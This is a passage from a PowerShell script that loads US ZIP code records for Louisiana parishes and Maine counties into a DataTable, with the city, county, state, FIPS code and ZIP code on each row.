Parish","Louisiana","LA","22","70782") + $null = $Cities.Rows.Add("Ventress","Pointe Coupee Parish","Louisiana","LA","22","70783") + $null = $Cities.Rows.Add("Walker","Livingston Parish","Louisiana","LA","22","70785") + $null = $Cities.Rows.Add("Weyanoke","West Feliciana Parish","Louisiana","LA","22","70787") + $null = $Cities.Rows.Add("White castle","Iberville Parish","Louisiana","LA","22","70788") + $null = $Cities.Rows.Add("Wilson","East Feliciana Parish","Louisiana","LA","22","70789") + $null = $Cities.Rows.Add("Zachary","East Baton Rouge Parish","Louisiana","LA","22","70791") + $null = $Cities.Rows.Add("Zcta 707hh","Ascension Parish","Louisiana","LA","22","707HH") + $null = $Cities.Rows.Add("Zcta 707xx","West Baton Rouge Parish","Louisiana","LA","22","707XX") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70801") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70802") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70805") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70806") + $null = $Cities.Rows.Add("Scotlandville","East Baton Rouge Parish","Louisiana","LA","22","70807") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70808") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70809") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70810") + $null = $Cities.Rows.Add("Greenwood","East Baton Rouge Parish","Louisiana","LA","22","70811") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70812") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70814") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70815") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70816") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70817") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70818") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70819") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70820") + $null = $Cities.Rows.Add("Baton rouge","East Baton Rouge Parish","Louisiana","LA","22","70836") + $null = $Cities.Rows.Add("Zcta 708hh","East Baton Rouge Parish","Louisiana","LA","22","708HH") + $null = $Cities.Rows.Add("Arcadia","Bienville Parish","Louisiana","LA","22","71001") + $null = $Cities.Rows.Add("Ashland","Natchitoches Parish","Louisiana","LA","22","71002") + $null = $Cities.Rows.Add("Athens","Claiborne Parish","Louisiana","LA","22","71003") + $null = $Cities.Rows.Add("Belcher","Caddo Parish","Louisiana","LA","22","71004") + $null = $Cities.Rows.Add("Benton","Bossier Parish","Louisiana","LA","22","71006") + $null = $Cities.Rows.Add("Bethany","Caddo Parish","Louisiana","LA","22","71007") + $null = $Cities.Rows.Add("Bienville","Bienville Parish","Louisiana","LA","22","71008") + $null = $Cities.Rows.Add("Blanchard","Caddo Parish","Louisiana","LA","22","71009") + $null = $Cities.Rows.Add("Castor","Bienville Parish","Louisiana","LA","22","71016") + $null = $Cities.Rows.Add("Cotton valley","Webster Parish","Louisiana","LA","22","71018") + $null = $Cities.Rows.Add("Hanna","Red River Parish","Louisiana","LA","22","71019") + $null = $Cities.Rows.Add("Cullen","Webster Parish","Louisiana","LA","22","71021") + $null = $Cities.Rows.Add("Doyline","Webster Parish","Louisiana","LA","22","71023") + $null = $Cities.Rows.Add("Dubberly","Webster Parish","Louisiana","LA","22","71024") + $null = $Cities.Rows.Add("Frierson","De Soto Parish","Louisiana","LA","22","71027") + $null = $Cities.Rows.Add("Gibsland","Bienville Parish","Louisiana","LA","22","71028") + $null = $Cities.Rows.Add("Gilliam","Caddo Parish","Louisiana","LA","22","71029") + $null = $Cities.Rows.Add("Gloster","De Soto Parish","Louisiana","LA","22","71030") + $null = $Cities.Rows.Add("Goldonna","Natchitoches Parish","Louisiana","LA","22","71031") + $null = $Cities.Rows.Add("Grand cane","De Soto Parish","Louisiana","LA","22","71032") + $null = $Cities.Rows.Add("Greenwood","Caddo Parish","Louisiana","LA","22","71033") + $null = $Cities.Rows.Add("Hall summit","Red River Parish","Louisiana","LA","22","71034") + $null = $Cities.Rows.Add("Haughton","Bossier Parish","Louisiana","LA","22","71037") + $null = $Cities.Rows.Add("Haynesville","Claiborne Parish","Louisiana","LA","22","71038") + $null = $Cities.Rows.Add("Heflin","Webster Parish","Louisiana","LA","22","71039") + $null = $Cities.Rows.Add("Homer","Claiborne Parish","Louisiana","LA","22","71040") + $null = $Cities.Rows.Add("Hosston","Caddo Parish","Louisiana","LA","22","71043") + $null = $Cities.Rows.Add("Ida","Caddo Parish","Louisiana","LA","22","71044") + $null = $Cities.Rows.Add("Jamestown","Bienville Parish","Louisiana","LA","22","71045") + $null = $Cities.Rows.Add("Keatchie","De Soto Parish","Louisiana","LA","22","71046") + $null = $Cities.Rows.Add("Keithville","Caddo Parish","Louisiana","LA","22","71047") + $null = $Cities.Rows.Add("Lisbon","Claiborne Parish","Louisiana","LA","22","71048") + $null = $Cities.Rows.Add("Logansport","De Soto Parish","Louisiana","LA","22","71049") + $null = $Cities.Rows.Add("Elm grove","Bossier Parish","Louisiana","LA","22","71051") + $null = $Cities.Rows.Add("Mansfield","De Soto Parish","Louisiana","LA","22","71052") + $null = $Cities.Rows.Add("Minden","Webster Parish","Louisiana","LA","22","71055") + $null = $Cities.Rows.Add("Mooringsport","Caddo Parish","Louisiana","LA","22","71060") + $null = $Cities.Rows.Add("Oil city","Caddo Parish","Louisiana","LA","22","71061") + $null = $Cities.Rows.Add("Pelican","De Soto Parish","Louisiana","LA","22","71063") + $null = $Cities.Rows.Add("Plain dealing","Bossier Parish","Louisiana","LA","22","71064") + $null = $Cities.Rows.Add("Pleasant hill","Sabine Parish","Louisiana","LA","22","71065") + $null = $Cities.Rows.Add("Powhatan","Natchitoches Parish","Louisiana","LA","22","71066") + $null = $Cities.Rows.Add("Princeton","Bossier Parish","Louisiana","LA","22","71067") + $null = $Cities.Rows.Add("Ringgold","Bienville Parish","Louisiana","LA","22","71068") + $null = $Cities.Rows.Add("Rodessa","Caddo Parish","Louisiana","LA","22","71069") + $null = $Cities.Rows.Add("Chestnut","Bienville Parish","Louisiana","LA","22","71070") + $null = $Cities.Rows.Add("Sarepta","Webster Parish","Louisiana","LA","22","71071") + $null = $Cities.Rows.Add("Shongaloo","Webster Parish","Louisiana","LA","22","71072") + $null = $Cities.Rows.Add("Sibley","Webster Parish","Louisiana","LA","22","71073") + $null = $Cities.Rows.Add("Springhill","Webster Parish","Louisiana","LA","22","71075") + $null = $Cities.Rows.Add("Stonewall","De Soto Parish","Louisiana","LA","22","71078") + $null = $Cities.Rows.Add("Summerfield","Claiborne Parish","Louisiana","LA","22","71079") + $null = $Cities.Rows.Add("Trees","Caddo Parish","Louisiana","LA","22","71082") + $null = $Cities.Rows.Add("Zcta 710hh","Bienville Parish","Louisiana","LA","22","710HH") + $null = $Cities.Rows.Add("Zcta 710xx","Natchitoches Parish","Louisiana","LA","22","710XX") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71101") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71103") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71104") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71105") + $null = $Cities.Rows.Add("Forbing","Caddo Parish","Louisiana","LA","22","71106") + $null = $Cities.Rows.Add("Dixie","Caddo Parish","Louisiana","LA","22","71107") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71108") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71109") + $null = $Cities.Rows.Add("Barksdale a f b","Bossier Parish","Louisiana","LA","22","71110") + $null = $Cities.Rows.Add("Bossier city","Bossier Parish","Louisiana","LA","22","71111") + $null = $Cities.Rows.Add("Bossier city","Bossier Parish","Louisiana","LA","22","71112") + $null = $Cities.Rows.Add("Caspiana","Caddo Parish","Louisiana","LA","22","71115") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71118") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71119") + $null = $Cities.Rows.Add("Shreveport","Caddo Parish","Louisiana","LA","22","71129") + $null = $Cities.Rows.Add("Zcta 711hh","Bossier Parish","Louisiana","LA","22","711HH") + $null = $Cities.Rows.Add("Monroe","Ouachita Parish","Louisiana","LA","22","71201") + $null = $Cities.Rows.Add("Richwood","Ouachita Parish","Louisiana","LA","22","71202") + $null = $Cities.Rows.Add("Monroe","Ouachita Parish","Louisiana","LA","22","71203") + $null = $Cities.Rows.Add("Archibald","Richland Parish","Louisiana","LA","22","71218") + $null = $Cities.Rows.Add("Baskin","Franklin Parish","Louisiana","LA","22","71219") + $null = $Cities.Rows.Add("Bastrop","Morehouse Parish","Louisiana","LA","22","71220") + $null = $Cities.Rows.Add("Bernice","Union Parish","Louisiana","LA","22","71222") + $null = $Cities.Rows.Add("Bonita","Morehouse Parish","Louisiana","LA","22","71223") + $null = $Cities.Rows.Add("Calhoun","Ouachita Parish","Louisiana","LA","22","71225") + $null = $Cities.Rows.Add("Chatham","Jackson Parish","Louisiana","LA","22","71226") + $null = $Cities.Rows.Add("Choudrant","Lincoln Parish","Louisiana","LA","22","71227") + $null = $Cities.Rows.Add("Collinston","Morehouse Parish","Louisiana","LA","22","71229") + $null = $Cities.Rows.Add("Warden","Richland Parish","Louisiana","LA","22","71232") + $null = $Cities.Rows.Add("Downsville","Union Parish","Louisiana","LA","22","71234") + $null = $Cities.Rows.Add("Dubach","Lincoln Parish","Louisiana","LA","22","71235") + $null = $Cities.Rows.Add("Epps","West Carroll Parish","Louisiana","LA","22","71237") + $null = $Cities.Rows.Add("Eros","Ouachita Parish","Louisiana","LA","22","71238") + $null = $Cities.Rows.Add("Farmerville","Union Parish","Louisiana","LA","22","71241") + $null = $Cities.Rows.Add("Fort necessity","Franklin Parish","Louisiana","LA","22","71243") + $null = $Cities.Rows.Add("Grambling","Lincoln Parish","Louisiana","LA","22","71245") + $null = $Cities.Rows.Add("Hodge","Jackson Parish","Louisiana","LA","22","71247") + $null = $Cities.Rows.Add("Jones","Morehouse Parish","Louisiana","LA","22","71250") + $null = $Cities.Rows.Add("Jonesboro","Jackson Parish","Louisiana","LA","22","71251") + $null = $Cities.Rows.Add("Kilbourne","West Carroll Parish","Louisiana","LA","22","71253") + $null = $Cities.Rows.Add("Lake providence","East Carroll Parish","Louisiana","LA","22","71254") + $null = $Cities.Rows.Add("Lillie","Union Parish","Louisiana","LA","22","71256") + $null = $Cities.Rows.Add("Mangham","Richland Parish","Louisiana","LA","22","71259") + $null = $Cities.Rows.Add("Linville","Union Parish","Louisiana","LA","22","71260") + $null = $Cities.Rows.Add("Mer rouge","Morehouse Parish","Louisiana","LA","22","71261") + $null = $Cities.Rows.Add("Terry","West Carroll Parish","Louisiana","LA","22","71263") + $null = $Cities.Rows.Add("Oak ridge","Morehouse Parish","Louisiana","LA","22","71264") + $null = $Cities.Rows.Add("Pioneer","West Carroll Parish","Louisiana","LA","22","71266") + $null = $Cities.Rows.Add("Quitman","Jackson Parish","Louisiana","LA","22","71268") + $null = $Cities.Rows.Add("Alto","Richland Parish","Louisiana","LA","22","71269") + $null = $Cities.Rows.Add("Ruston","Lincoln Parish","Louisiana","LA","22","71270") + $null = $Cities.Rows.Add("Simsboro","Lincoln Parish","Louisiana","LA","22","71275") + $null = $Cities.Rows.Add("Sondheimer","East Carroll Parish","Louisiana","LA","22","71276") + $null = $Cities.Rows.Add("Spearsville","Union Parish","Louisiana","LA","22","71277") + $null = $Cities.Rows.Add("Spencer","Ouachita Parish","Louisiana","LA","22","71280") + $null = $Cities.Rows.Add("Mound","Madison Parish","Louisiana","LA","22","71282") + $null = $Cities.Rows.Add("Transylvania","East Carroll Parish","Louisiana","LA","22","71286") + $null = $Cities.Rows.Add("West monroe","Ouachita Parish","Louisiana","LA","22","71291") + $null = $Cities.Rows.Add("West monroe","Ouachita Parish","Louisiana","LA","22","71292") + $null = $Cities.Rows.Add("Winnsboro","Franklin Parish","Louisiana","LA","22","71295") + $null = $Cities.Rows.Add("Zcta 712hh","East Carroll Parish","Louisiana","LA","22","712HH") + $null = $Cities.Rows.Add("Zcta 712xx","Madison Parish","Louisiana","LA","22","712XX") + $null = $Cities.Rows.Add("Alexandria","Rapides Parish","Louisiana","LA","22","71301") + $null = $Cities.Rows.Add("Alexandria","Rapides Parish","Louisiana","LA","22","71302") + $null = $Cities.Rows.Add("Alexandria","Rapides Parish","Louisiana","LA","22","71303") + $null = $Cities.Rows.Add("Acme","Concordia Parish","Louisiana","LA","22","71316") + $null = $Cities.Rows.Add("Bordelonville","Avoyelles Parish","Louisiana","LA","22","71320") + $null = $Cities.Rows.Add("Eola","Avoyelles Parish","Louisiana","LA","22","71322") + $null = $Cities.Rows.Add("Center point","Avoyelles Parish","Louisiana","LA","22","71323") + $null = $Cities.Rows.Add("Cheneyville","Rapides Parish","Louisiana","LA","22","71325") + $null = $Cities.Rows.Add("Clayton","Concordia Parish","Louisiana","LA","22","71326") + $null = $Cities.Rows.Add("Cottonport","Avoyelles Parish","Louisiana","LA","22","71327") + $null = $Cities.Rows.Add("Buckeye","Rapides Parish","Louisiana","LA","22","71328") + $null = $Cities.Rows.Add("Echo","Rapides Parish","Louisiana","LA","22","71330") + $null = $Cities.Rows.Add("Vick","Avoyelles Parish","Louisiana","LA","22","71331") + $null = $Cities.Rows.Add("Goudeau","Avoyelles Parish","Louisiana","LA","22","71333") + $null = $Cities.Rows.Add("Frogmore","Concordia Parish","Louisiana","LA","22","71334") + $null = $Cities.Rows.Add("Gilbert","Franklin Parish","Louisiana","LA","22","71336") + $null = $Cities.Rows.Add("Hamburg","Avoyelles Parish","Louisiana","LA","22","71339") + $null = $Cities.Rows.Add("Harrisonburg","Catahoula Parish","Louisiana","LA","22","71340") + $null = $Cities.Rows.Add("Hessmer","Avoyelles Parish","Louisiana","LA","22","71341") + $null = $Cities.Rows.Add("Jena","La Salle Parish","Louisiana","LA","22","71342") + $null = $Cities.Rows.Add("Larto","Catahoula Parish","Louisiana","LA","22","71343") + $null = $Cities.Rows.Add("Rosa","St. Landry Parish","Louisiana","LA","22","71345") + $null = $Cities.Rows.Add("Lecompte","Rapides Parish","Louisiana","LA","22","71346") + $null = $Cities.Rows.Add("Mansura","Avoyelles Parish","Louisiana","LA","22","71350") + $null = $Cities.Rows.Add("Marksville","Avoyelles Parish","Louisiana","LA","22","71351") + $null = $Cities.Rows.Add("Melville","St. Landry Parish","Louisiana","LA","22","71353") + $null = $Cities.Rows.Add("Monterey","Concordia Parish","Louisiana","LA","22","71354") + $null = $Cities.Rows.Add("Moreauville","Avoyelles Parish","Louisiana","LA","22","71355") + $null = $Cities.Rows.Add("Le moyen","St. Landry Parish","Louisiana","LA","22","71356") + $null = $Cities.Rows.Add("Newellton","Tensas Parish","Louisiana","LA","22","71357") + $null = $Cities.Rows.Add("Palmetto","St. Landry Parish","Louisiana","LA","22","71358") + $null = $Cities.Rows.Add("Kolin","Rapides Parish","Louisiana","LA","22","71360") + $null = $Cities.Rows.Add("Plaucheville","Avoyelles Parish","Louisiana","LA","22","71362") + $null = $Cities.Rows.Add("Saint joseph","Tensas Parish","Louisiana","LA","22","71366") + $null = $Cities.Rows.Add("Saint landry","Evangeline Parish","Louisiana","LA","22","71367") + $null = $Cities.Rows.Add("Sicily island","Catahoula Parish","Louisiana","LA","22","71368") + $null = $Cities.Rows.Add("Simmesport","Avoyelles Parish","Louisiana","LA","22","71369") + $null = $Cities.Rows.Add("Trout","La Salle Parish","Louisiana","LA","22","71371") + $null = $Cities.Rows.Add("Vidalia","Concordia Parish","Louisiana","LA","22","71373") + $null = $Cities.Rows.Add("Waterproof","Tensas Parish","Louisiana","LA","22","71375") + $null = $Cities.Rows.Add("Wildsville","Concordia Parish","Louisiana","LA","22","71377") + $null = $Cities.Rows.Add("Wisner","Franklin Parish","Louisiana","LA","22","71378") + $null = $Cities.Rows.Add("Zcta 713hh","Avoyelles Parish","Louisiana","LA","22","713HH") + $null = $Cities.Rows.Add("Zcta 713xx","Tensas Parish","Louisiana","LA","22","713XX") + $null = $Cities.Rows.Add("Aimwell","Catahoula Parish","Louisiana","LA","22","71401") + $null = $Cities.Rows.Add("Anacoco","Vernon Parish","Louisiana","LA","22","71403") + $null = $Cities.Rows.Add("Atlanta","Winn Parish","Louisiana","LA","22","71404") + $null = $Cities.Rows.Add("Belmont","Sabine Parish","Louisiana","LA","22","71406") + $null = $Cities.Rows.Add("Bentley","Grant Parish","Louisiana","LA","22","71407") + $null = $Cities.Rows.Add("Boyce","Rapides Parish","Louisiana","LA","22","71409") + $null = $Cities.Rows.Add("Calvin","Winn Parish","Louisiana","LA","22","71410") + $null = $Cities.Rows.Add("Campti","Natchitoches Parish","Louisiana","LA","22","71411") + $null = $Cities.Rows.Add("Clarence","Natchitoches Parish","Louisiana","LA","22","71414") + $null = $Cities.Rows.Add("Clarks","Caldwell Parish","Louisiana","LA","22","71415") + $null = $Cities.Rows.Add("Derry","Natchitoches Parish","Louisiana","LA","22","71416") + $null = $Cities.Rows.Add("Colfax","Grant Parish","Louisiana","LA","22","71417") + $null = $Cities.Rows.Add("Hebert","Caldwell Parish","Louisiana","LA","22","71418") + $null = $Cities.Rows.Add("Mitchell","Sabine Parish","Louisiana","LA","22","71419") + $null = $Cities.Rows.Add("Dodson","Winn Parish","Louisiana","LA","22","71422") + $null = $Cities.Rows.Add("Dry prong","Grant Parish","Louisiana","LA","22","71423") + $null = $Cities.Rows.Add("Elmer","Rapides Parish","Louisiana","LA","22","71424") + $null = $Cities.Rows.Add("Enterprise","Catahoula Parish","Louisiana","LA","22","71425") + $null = $Cities.Rows.Add("Fisher","Sabine Parish","Louisiana","LA","22","71426") + $null = $Cities.Rows.Add("Flatwoods","Rapides Parish","Louisiana","LA","22","71427") + $null = $Cities.Rows.Add("Florien","Sabine Parish","Louisiana","LA","22","71429") + $null = $Cities.Rows.Add("Forest hill","Rapides Parish","Louisiana","LA","22","71430") + $null = $Cities.Rows.Add("Georgetown","Grant Parish","Louisiana","LA","22","71432") + $null = $Cities.Rows.Add("Calcasieu","Rapides Parish","Louisiana","LA","22","71433") + $null = $Cities.Rows.Add("Gorum","Natchitoches Parish","Louisiana","LA","22","71434") + $null = $Cities.Rows.Add("Grayson","Caldwell Parish","Louisiana","LA","22","71435") + $null = $Cities.Rows.Add("Leander","Rapides Parish","Louisiana","LA","22","71438") + $null = $Cities.Rows.Add("Hornbeck","Vernon Parish","Louisiana","LA","22","71439") + $null = $Cities.Rows.Add("Kelly","Caldwell Parish","Louisiana","LA","22","71441") + $null = $Cities.Rows.Add("Hicks","Vernon Parish","Louisiana","LA","22","71446") + $null = $Cities.Rows.Add("Chopin","Rapides Parish","Louisiana","LA","22","71447") + $null = $Cities.Rows.Add("Many","Sabine Parish","Louisiana","LA","22","71449") + $null = $Cities.Rows.Add("Marthaville","Natchitoches Parish","Louisiana","LA","22","71450") + $null = $Cities.Rows.Add("Melrose","Natchitoches Parish","Louisiana","LA","22","71452") + $null = $Cities.Rows.Add("Montgomery","Grant Parish","Louisiana","LA","22","71454") + $null = $Cities.Rows.Add("Clifton","Rapides Parish","Louisiana","LA","22","71455") + $null = $Cities.Rows.Add("Natchez","Natchitoches Parish","Louisiana","LA","22","71456") + $null = $Cities.Rows.Add("Natchitoches","Natchitoches Parish","Louisiana","LA","22","71457") + $null = $Cities.Rows.Add("Fort polk","Vernon Parish","Louisiana","LA","22","71459") + $null = $Cities.Rows.Add("Newllano","Vernon Parish","Louisiana","LA","22","71461") + $null = $Cities.Rows.Add("Noble","Sabine Parish","Louisiana","LA","22","71462") + $null = $Cities.Rows.Add("Oakdale","Allen Parish","Louisiana","LA","22","71463") + $null = $Cities.Rows.Add("Olla","La Salle Parish","Louisiana","LA","22","71465") + $null = $Cities.Rows.Add("Otis","Rapides Parish","Louisiana","LA","22","71466") + $null = $Cities.Rows.Add("Pollock","Grant Parish","Louisiana","LA","22","71467") + $null = $Cities.Rows.Add("Provencal","Natchitoches Parish","Louisiana","LA","22","71468") + $null = $Cities.Rows.Add("Robeline","Natchitoches Parish","Louisiana","LA","22","71469") + $null = $Cities.Rows.Add("Sieper","Rapides Parish","Louisiana","LA","22","71472") + $null = $Cities.Rows.Add("Sikes","Winn Parish","Louisiana","LA","22","71473") + $null = $Cities.Rows.Add("Temple","Vernon Parish","Louisiana","LA","22","71474") + $null = $Cities.Rows.Add("Tullos","La Salle Parish","Louisiana","LA","22","71479") + $null = $Cities.Rows.Add("Urania","La Salle Parish","Louisiana","LA","22","71480") + $null = $Cities.Rows.Add("Winnfield","Winn Parish","Louisiana","LA","22","71483") + $null = $Cities.Rows.Add("Woodworth","Rapides Parish","Louisiana","LA","22","71485") + $null = $Cities.Rows.Add("Zwolle","Sabine Parish","Louisiana","LA","22","71486") + $null = $Cities.Rows.Add("Zcta 714hh","Catahoula Parish","Louisiana","LA","22","714HH") + $null = $Cities.Rows.Add("Zcta 714xx","Vernon Parish","Louisiana","LA","22","714XX") + $null = $Cities.Rows.Add("","Union Parish","Louisiana","LA","22","71749") + $null = $Cities.Rows.Add("Berwick","York","Maine","ME","23","03901") + $null = $Cities.Rows.Add("Cape neddick","York","Maine","ME","23","03902") + $null = $Cities.Rows.Add("Eliot","York","Maine","ME","23","03903") + $null = $Cities.Rows.Add("Kittery","York","Maine","ME","23","03904") + $null = $Cities.Rows.Add("Kittery point","York","Maine","ME","23","03905") + $null = $Cities.Rows.Add("North berwick","York","Maine","ME","23","03906") + $null = $Cities.Rows.Add("Ogunquit","York","Maine","ME","23","03907") + $null = $Cities.Rows.Add("South berwick","York","Maine","ME","23","03908") + $null = $Cities.Rows.Add("York","York","Maine","ME","23","03909") + $null = $Cities.Rows.Add("Zcta 039hh","York","Maine","ME","23","039HH") + $null = $Cities.Rows.Add("Acton","York","Maine","ME","23","04001") + $null = $Cities.Rows.Add("Alfred","York","Maine","ME","23","04002") + $null = $Cities.Rows.Add("Bailey island","Cumberland","Maine","ME","23","04003") + $null = $Cities.Rows.Add("Arundel","York","Maine","ME","23","04005") + $null = $Cities.Rows.Add("Bowdoinham","Sagadahoc","Maine","ME","23","04008") + $null = $Cities.Rows.Add("Bridgton","Cumberland","Maine","ME","23","04009") + $null = $Cities.Rows.Add("Brownfield","Oxford","Maine","ME","23","04010") + $null = $Cities.Rows.Add("Birch island","Cumberland","Maine","ME","23","04011") + $null = $Cities.Rows.Add("Casco","Cumberland","Maine","ME","23","04015") + $null = $Cities.Rows.Add("Chebeague island","Cumberland","Maine","ME","23","04017") + $null = $Cities.Rows.Add("Cliff island","Cumberland","Maine","ME","23","04019") + $null = $Cities.Rows.Add("Cornish","York","Maine","ME","23","04020") + $null = $Cities.Rows.Add("Cumberland cente","Cumberland","Maine","ME","23","04021") + $null = $Cities.Rows.Add("Denmark","Oxford","Maine","ME","23","04022") + $null = $Cities.Rows.Add("East baldwin","Cumberland","Maine","ME","23","04024") + $null = $Cities.Rows.Add("West lebanon","York","Maine","ME","23","04027") + $null = $Cities.Rows.Add("North sebago","Cumberland","Maine","ME","23","04029") + $null = $Cities.Rows.Add("East waterboro","York","Maine","ME","23","04030") + $null = $Cities.Rows.Add("Freeport","Cumberland","Maine","ME","23","04032") + $null = $Cities.Rows.Add("Fryeburg","Oxford","Maine","ME","23","04037") + $null = $Cities.Rows.Add("Gorham","Cumberland","Maine","ME","23","04038") + $null = $Cities.Rows.Add("Gray","Cumberland","Maine","ME","23","04039") + $null = $Cities.Rows.Add("Harrison","Cumberland","Maine","ME","23","04040") + $null = $Cities.Rows.Add("Hiram","Oxford","Maine","ME","23","04041") + $null = $Cities.Rows.Add("Hollis center","York","Maine","ME","23","04042") + $null = $Cities.Rows.Add("Kennebunk","York","Maine","ME","23","04043") + $null = $Cities.Rows.Add("Kennebunkport","York","Maine","ME","23","04046") + $null = $Cities.Rows.Add("Kezar falls","York","Maine","ME","23","04047") + $null = $Cities.Rows.Add("Limerick","York","Maine","ME","23","04048") + $null = $Cities.Rows.Add("Limington","York","Maine","ME","23","04049") + $null = $Cities.Rows.Add("Long island","Cumberland","Maine","ME","23","04050") + $null = $Cities.Rows.Add("Lovell","Oxford","Maine","ME","23","04051") + $null = $Cities.Rows.Add("Naples","Cumberland","Maine","ME","23","04055") + $null = $Cities.Rows.Add("North waterboro","York","Maine","ME","23","04061") + $null = $Cities.Rows.Add("Windham","Cumberland","Maine","ME","23","04062") + $null = $Cities.Rows.Add("Old orchard beac","York","Maine","ME","23","04064") + $null = $Cities.Rows.Add("Orrs island","Cumberland","Maine","ME","23","04066") + $null = $Cities.Rows.Add("Porter","Oxford","Maine","ME","23","04068") + $null = $Cities.Rows.Add("Pownal","Cumberland","Maine","ME","23","04069") + $null = $Cities.Rows.Add("Raymond","Cumberland","Maine","ME","23","04071") + $null = $Cities.Rows.Add("Saco","York","Maine","ME","23","04072") + $null = $Cities.Rows.Add("Sanford","York","Maine","ME","23","04073") + $null = $Cities.Rows.Add("Scarborough","Cumberland","Maine","ME","23","04074") + $null = $Cities.Rows.Add("Shapleigh","York","Maine","ME","23","04076") + $null = $Cities.Rows.Add("South harpswell","Cumberland","Maine","ME","23","04079") + $null = $Cities.Rows.Add("Springvale","York","Maine","ME","23","04083") + $null = $Cities.Rows.Add("Standish","Cumberland","Maine","ME","23","04084") + $null = $Cities.Rows.Add("Steep falls","Cumberland","Maine","ME","23","04085") + $null = $Cities.Rows.Add("Pejepscot","Sagadahoc","Maine","ME","23","04086") + $null = $Cities.Rows.Add("Waterboro","York","Maine","ME","23","04087") + $null = $Cities.Rows.Add("Waterford","Oxford","Maine","ME","23","04088") + $null = $Cities.Rows.Add("Wells","York","Maine","ME","23","04090") + $null = $Cities.Rows.Add("West baldwin","Cumberland","Maine","ME","23","04091") + $null = $Cities.Rows.Add("Westbrook","Cumberland","Maine","ME","23","04092") + $null = $Cities.Rows.Add("West buxton","York","Maine","ME","23","04093") + $null = $Cities.Rows.Add("Maplewood","York","Maine","ME","23","04095") + $null = $Cities.Rows.Add("Yarmouth","Cumberland","Maine","ME","23","04096") + $null = $Cities.Rows.Add("North yarmouth","Cumberland","Maine","ME","23","04097") + $null = $Cities.Rows.Add("Zcta 040hh","Cumberland","Maine","ME","23","040HH") + $null = $Cities.Rows.Add("Portland","Cumberland","Maine","ME","23","04101") + $null = $Cities.Rows.Add("Portland","Cumberland","Maine","ME","23","04102") + $null = $Cities.Rows.Add("Portland","Cumberland","Maine","ME","23","04103") + $null = $Cities.Rows.Add("Falmouth","Cumberland","Maine","ME","23","04105") + $null = $Cities.Rows.Add("South portland","Cumberland","Maine","ME","23","04106") + $null = $Cities.Rows.Add("Cape elizabeth","Cumberland","Maine","ME","23","04107") + $null = $Cities.Rows.Add("Peaks island","Cumberland","Maine","ME","23","04108") + $null = $Cities.Rows.Add("Cumberland fores","Cumberland","Maine","ME","23","04110") + $null = $Cities.Rows.Add("Zcta 041hh","Cumberland","Maine","ME","23","041HH") + $null = $Cities.Rows.Add("Auburn","Androscoggin","Maine","ME","23","04210") + $null = $Cities.Rows.Add("Andover","Oxford","Maine","ME","23","04216") + $null = $Cities.Rows.Add("Bethel","Oxford","Maine","ME","23","04217") + $null = $Cities.Rows.Add("Bryant pond","Oxford","Maine","ME","23","04219") + $null = $Cities.Rows.Add("Buckfield","Oxford","Maine","ME","23","04220") + $null = $Cities.Rows.Add("Canton","Oxford","Maine","ME","23","04221") + $null = $Cities.Rows.Add("Durham","Androscoggin","Maine","ME","23","04222") + $null = $Cities.Rows.Add("Dixfield","Oxford","Maine","ME","23","04224") + $null = $Cities.Rows.Add("East andover","Oxford","Maine","ME","23","04226") + $null = $Cities.Rows.Add("East livermore","Androscoggin","Maine","ME","23","04228") + $null = $Cities.Rows.Add("East stoneham","Oxford","Maine","ME","23","04231") + $null = $Cities.Rows.Add("Greene","Androscoggin","Maine","ME","23","04236") + $null = $Cities.Rows.Add("Hanover","Oxford","Maine","ME","23","04237") + $null = $Cities.Rows.Add("Hebron","Oxford","Maine","ME","23","04238") + $null = $Cities.Rows.Add("Jay","Franklin","Maine","ME","23","04239") + $null = $Cities.Rows.Add("Lewiston","Androscoggin","Maine","ME","23","04240") + $null = $Cities.Rows.Add("Lisbon","Androscoggin","Maine","ME","23","04250") + $null = $Cities.Rows.Add("Lisbon falls","Androscoggin","Maine","ME","23","04252") + $null = $Cities.Rows.Add("Livermore","Androscoggin","Maine","ME","23","04253") + $null = $Cities.Rows.Add("Livermore falls","Androscoggin","Maine","ME","23","04254") + $null = $Cities.Rows.Add("Locke mills","Oxford","Maine","ME","23","04255") + $null = $Cities.Rows.Add("Mechanic falls","Androscoggin","Maine","ME","23","04256") + $null = $Cities.Rows.Add("Mexico","Oxford","Maine","ME","23","04257") + $null = $Cities.Rows.Add("Minot","Androscoggin","Maine","ME","23","04258") + $null = $Cities.Rows.Add("Monmouth","Kennebec","Maine","ME","23","04259") + $null = $Cities.Rows.Add("New gloucester","Cumberland","Maine","ME","23","04260") + $null = $Cities.Rows.Add("Newry","Oxford","Maine","ME","23","04261") + $null = $Cities.Rows.Add("Leeds","Androscoggin","Maine","ME","23","04263") + $null 